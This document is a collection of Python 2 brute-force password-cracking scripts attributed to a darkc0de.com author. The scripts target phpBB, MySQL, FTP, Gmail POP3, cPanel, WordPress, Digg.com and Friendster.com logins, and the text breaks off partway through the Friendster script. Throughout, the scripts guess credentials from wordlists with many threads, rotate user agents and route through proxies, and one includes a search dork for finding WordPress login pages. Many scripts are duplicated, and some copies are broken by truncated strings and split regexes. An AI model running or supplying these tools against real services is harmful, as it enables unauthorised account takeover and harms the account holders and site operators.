#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./phpBBbrute.py
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com phpBBBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] User:",sys.argv[2]
print "[+] Words Loaded:",len(words),"\n"
headers = ["Mozilla/5.0 (compatible)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)", "Windows NT 6.0 (MSIE 7.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Windows NT 4.0 (MSIE 5.0)"]
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[2],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent", random.sample(headers, 1)[0])]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen(sys.argv[1])
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["username"] = sys.argv[2]
form["password"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("invalid password", line.lower()) != None:
print "\tSuccessful Login:", value
print line
success = value
sys.exit(1)
if re.search("The maximum number of 5 login attempts has been exceeded.",line):
print "Attempts exceeded"
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login:",sys.argv[1]
print "[+] User:",sys.argv[2]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
MySQL Brute Forcer
#!usr/bin/python
#MySQL Brute Forcer
#You need the MySQLdb package found here:
#http://sourceforge.net/projects/mysql-python
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys
from copy import copy
try:
import MySQLdb
except(ImportError):
print "\nYou need the MySQLdb package found here: http://sourceforge.net/projects/mysql-python\n"
sys.exit(1)
if len(sys.argv) !=6:
print "Usage: ./mysqlbrute.py "
sys.exit(1)
try:
users = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[5], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com MySQLBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Port:",sys.argv[2]
print "[+] Database:",sys.argv[3]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
db=MySQLdb.connect(host=sys.argv[1],user=user,passwd=value,db=sys.argv[3],port=int(sys.argv[2]))
print "\t\nLogin successful:",value, user
db.close()
work.join()
sys.exit(2)
except(MySQLdb.Error), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
#MySQL Brute Forcer
#You need the MySQLdb package found here:
#http://sourceforge.net/projects/mysql-python
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys
from copy import copy
try:
import MySQLdb
except(ImportError):
print "\nYou need the MySQLdb package found here: http://sourceforge.net/projects/mysql-python\n"
sys.exit(1)
if len(sys.argv) !=6:
print "Usage: ./mysqlbrute.py
sys.exit(1)
try:
users = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[5], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com MySQLBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Port:",sys.argv[2]
print "[+] Database:",sys.argv[3]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
db=MySQLdb.connect(host=sys.argv[1],user=user,passwd=value,db=sys.argv[3],port=int(sys.argv[2]))
print "\t\nLogin successful:",value, user
db.close()
work.join()
sys.exit(2)
except(MySQLdb.Error), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
FTP brute forcer
#!usr/bin/python
#Ftp Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, ftplib
from ftplib import FTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./ftpbrute.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com ftpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
try:
f = FTP(sys.argv[1])
print "[+] Response:",f.getwelcome()
except (ftplib.all_errors):
pass
try:
print "\n[+] Checking for anonymous login\n"
ftp = FTP(sys.argv[1])
ftp.login()
ftp.retrlines('LIST')
print "\t\nAnonymous login successful!!!\n"
ftp.quit()
except (ftplib.all_errors):
print "\tAnonymous login unsuccessful\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
ftp = FTP(sys.argv[1])
ftp.login(user, value)
ftp.retrlines('LIST')
print "\t\nLogin successful:",value, user
ftp.quit()
work.join()
sys.exit(2)
except (ftplib.all_errors), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
#Ftp Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, ftplib
from ftplib import FTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./ftpbrute.py
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com ftpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
try:
f = FTP(sys.argv[1])
print "[+] Response:",f.getwelcome()
except (ftplib.all_errors):
pass
try:
print "\n[+] Checking for anonymous login\n"
ftp = FTP(sys.argv[1])
ftp.login()
ftp.retrlines('LIST')
print "\t\nAnonymous login successful!!!\n"
ftp.quit()
except (ftplib.all_errors):
print "\tAnonymous login unsuccessful\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
ftp = FTP(sys.argv[1])
ftp.login(user, value)
ftp.retrlines('LIST')
print "\t\nLogin successful:",value, user
ftp.quit()
work.join()
sys.exit(2)
except (ftplib.all_errors), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
Gmail Pop3 Brute Forcer
#!usr/bin/python
#Gmail Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, poplib
from copy import copy
if len(sys.argv) !=3:
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "\t Usage: ./gmailpopbrute.py \n"
sys.exit(1)
server = "pop.gmail.com"
success = []
try:
users = open(sys.argv[1], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
try:
pop = poplib.POP3_SSL(server, 995)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "[+] Server:",server
print "[+] Port: 995"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "[-] Reloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0], users[0]
else:
return value[0], users[0]
class Worker(threading.Thread):
def run(self):
value, user = getword()
user = user.replace("\n","")
value = value.replace("\n","")
try:
print "-"*12
print "[+] User:",user,"Password:",value
pop = poplib.POP3_SSL(server, 995)
pop.user(user)
pop.pass_(value)
print "\t\t\n\nLogin successful:",user, value
print "\t\tMail:",pop.stat()[0],"emails"
print "\t\tSize:",pop.stat()[1],"bytes\n\n"
success.append(user)
success.append(value)
success.append(pop.stat()[0])
success.append(pop.stat()[1])
pop.quit()
except (poplib.error_proto), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
if len(success) >=1:
print "\n\n[+] Login successful:",success[0], success[1]
print "\t[+] Mail:",success[2],"emails"
print "\t[+] Size:",success[3],"bytes\n"
print "\n[-] Done"
#Gmail Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, poplib
from copy import copy
if len(sys.argv) !=3:
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "\t Usage: ./gmailpopbrute.py
sys.exit(1)
server = "pop.gmail.com"
success = []
try:
users = open(sys.argv[1], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
try:
pop = poplib.POP3_SSL(server, 995)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "[+] Server:",server
print "[+] Port: 995"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "[-] Reloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0], users[0]
else:
return value[0], users[0]
class Worker(threading.Thread):
def run(self):
value, user = getword()
user = user.replace("\n","")
value = value.replace("\n","")
try:
print "-"*12
print "[+] User:",user,"Password:",value
pop = poplib.POP3_SSL(server, 995)
pop.user(user)
pop.pass_(value)
print "\t\t\n\nLogin successful:",user, value
print "\t\tMail:",pop.stat()[0],"emails"
print "\t\tSize:",pop.stat()[1],"bytes\n\n"
success.append(user)
success.append(value)
success.append(pop.stat()[0])
success.append(pop.stat()[1])
pop.quit()
except (poplib.error_proto), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
if len(success) >=1:
print "\n\n[+] Login successful:",success[0], success[1]
print "\t[+] Mail:",success[2],"emails"
print "\t[+] Size:",success[3],"bytes\n"
print "\n[-] Done"
CPanel Brute Forcer
#!usr/bin/python
#cPanel BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, urllib2, httplib, base64
from copy import copy
def title():
print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0"
print "\t-----------------------------------------------------\n"
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) !=5:
title()
print "\nUsage: ./cPanelbrute.py \n"
print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n"
sys.exit(1)
try:
users = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return users[0], value[0][:-1]
else:
return users[0][:-1], value[0][:-1]
def getauth(url):
req = urllib2.Request(url)
try:
handle = urllib2.urlopen(req)
except IOError, e:
pass
else:
print "This page isn't protected by basic authentication.\n"
sys.exit(1)
if not hasattr(e, 'code') or e.code != 401:
print "\nThis page isn't protected by basic authentication."
print 'But we failed for another reason.\n'
sys.exit(1)
authline = e.headers.get('www-authenticate', '')
if not authline:
print '\nA 401 error without a basic authentication response header - very weird.\n'
sys.exit(1)
else:
return authline
class Worker(threading.Thread):
def run(self):
username, password = getword()
try:
print "-"*12
print "User:",username,"Password:",password
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
urllib2.urlopen(server)
print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"
except (urllib2.HTTPError, httplib.BadStatusLine), msg:
#print "An error occurred:", msg
pass
title()
if sys.argv[1][-1] == "/":
sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":2082"
if sys.argv[2].isdigit() == False:
print "[-] Port must be a number\n"
sys.exit(1)
else:
port = sys.argv[2]
if sys.argv[1][-1] == "/":
sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":"+port
print "[+] Server:",server
print "[+] Port:",port
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+]",getauth(server)
print "[+] Started",timer(),"\n"
for i in range(len(words)*len(users)):
work = Worker()
work.setDaemon(1)
work.start()
time.sleep(1)
print "\n[-] Done -",timer(),"\n"
#cPanel BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, urllib2, httplib, base64
from copy import copy
def title():
print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0"
print "\t-----------------------------------------------------\n"
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) !=5:
title()
print "\nUsage: ./cPanelbrute.py
print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n"
sys.exit(1)
try:
users = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return users[0], value[0][:-1]
else:
return users[0][:-1], value[0][:-1]
def getauth(url):
req = urllib2.Request(url)
try:
handle = urllib2.urlopen(req)
except IOError, e:
pass
else:
print "This page isn't protected by basic authentication.\n"
sys.exit(1)
if not hasattr(e, 'code') or e.code != 401:
print "\nThis page isn't protected by basic authentication."
print 'But we failed for another reason.\n'
sys.exit(1)
authline = e.headers.get('www-authenticate', '')
if not authline:
print '\nA 401 error without a basic authentication response header - very weird.\n'
sys.exit(1)
else:
return authline
class Worker(threading.Thread):
def run(self):
username, password = getword()
try:
print "-"*12
print "User:",username,"Password:",password
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
urllib2.urlopen(server)
print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"
except (urllib2.HTTPError, httplib.BadStatusLine), msg:
#print "An error occurred:", msg
pass
title()
if sys.argv[1][-1] == "/":
sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":2082"
if sys.argv[2].isdigit() == False:
print "[-] Port must be a number\n"
sys.exit(1)
else:
port = sys.argv[2]
if sys.argv[1][-1] == "/":
sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":"+port
print "[+] Server:",server
print "[+] Port:",port
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+]",getauth(server)
print "[+] Started",timer(),"\n"
for i in range(len(words)*len(users)):
work = Worker()
work.setDaemon(1)
work.start()
time.sleep(1)
print "\n[-] Done -",timer(),"\n"
wordpress BruteForce
#!/usr/bin/python
#WordPress Brute Force (wp-login.php)
#If cookies enabled brute force will not work (yet)
#Change response on line 97 if needed. (language)
#Dork: inurl:wp-login.php
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com WordPressBF v1.0"
print "----------------------------------------------"
if len(sys.argv) not in [4,5,6,7]:
print "Usage: ./wordpressbf.py \n"
print "\t -p/-proxy : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('log', sys.argv[2]),
('pwd', word),
('rememberme', 'forever'),
('wp-submit', 'Login >>'),
('redirect_to', 'wp-admin/')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("WordPress requires Cookies",site):
print "[-] Failed: WordPress has cookies enabled\n"
sys.exit(1)
#Change this response if different. (language)
if re.search("ERROR",site) and verbose == 1:
print "[-] Login Failed:",word
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
sys.exit(1)
print "\n[-] Brute Complete\n"
#WordPress Brute Force (wp-login.php)
#If cookies enabled brute force will not work (yet)
#Change response on line 97 if needed. (language)
#Dork: inurl:wp-login.php
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com WordPressBF v1.0"
print "----------------------------------------------"
if len(sys.argv) not in [4,5,6,7]:
print "Usage: ./wordpressbf.py
print "\t -p/-proxy
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('log', sys.argv[2]),
('pwd', word),
('rememberme', 'forever'),
('wp-submit', 'Login >>'),
('redirect_to', 'wp-admin/')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("WordPress requires Cookies",site):
print "[-] Failed: WordPress has cookies enabled\n"
sys.exit(1)
#Change this response if different. (language)
if re.search("ERROR",site) and verbose == 1:
print "[-] Login Failed:",word
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
sys.exit(1)
print "\n[-] Brute Complete\n"
Digg.com Login BruteForcer
#!/usr/bin/python
#Digg.com Login BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com diggBF v1.0"
print "----------------------------------------------"
if len(sys.argv) not in [3,4,5,6]:
print "Usage: ./diggbf.py \n"
print "\t -p/-proxy : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
host = "http://digg.com/login"
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[1]
try:
words = open(sys.argv[2], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('username', sys.argv[1]),
('password', word),
('persistent', 'on'),
('submit', 'Login'),
('processlogin', '1'),
('returnpage', '/')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(host, proxy_handler)
else:
opener = urllib2.build_opener(host)
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("
print "\n\t[!] Login Successfull:",sys.argv[1],word,"\n"
sys.exit(1)
else:
if verbose == 1:
print "[-] Login Failed:",word
print "\n[-] Brute Complete\n"
#Digg.com Login BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com diggBF v1.0"
print "----------------------------------------------"
if len(sys.argv) not in [3,4,5,6]:
print "Usage: ./diggbf.py
print "\t -p/-proxy
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
host = "http://digg.com/login"
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[1]
try:
words = open(sys.argv[2], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('username', sys.argv[1]),
('password', word),
('persistent', 'on'),
('submit', 'Login'),
('processlogin', '1'),
('returnpage', '/')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(host, proxy_handler)
else:
opener = urllib2.build_opener(host)
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("
Whoops!
",site) == None:print "\n\t[!] Login Successfull:",sys.argv[1],word,"\n"
sys.exit(1)
else:
if verbose == 1:
print "[-] Login Failed:",word
print "\n[-] Brute Complete\n"
Friendster.com Login BruteForcer
#!/usr/bin/python
#Friendster.com Login BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com friendsterBF v1.1"
print "----------------------------------------------"
if len(sys.argv) not in [3,4,5,6]:
print "Usage: ./friendsterbf.py \n"
print "\t -p/-proxy : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
host = "http://www.friendster.com/login.php"
print "[+] BruteForcing:",host
print "[+] Email:",sys.argv[1]
try:
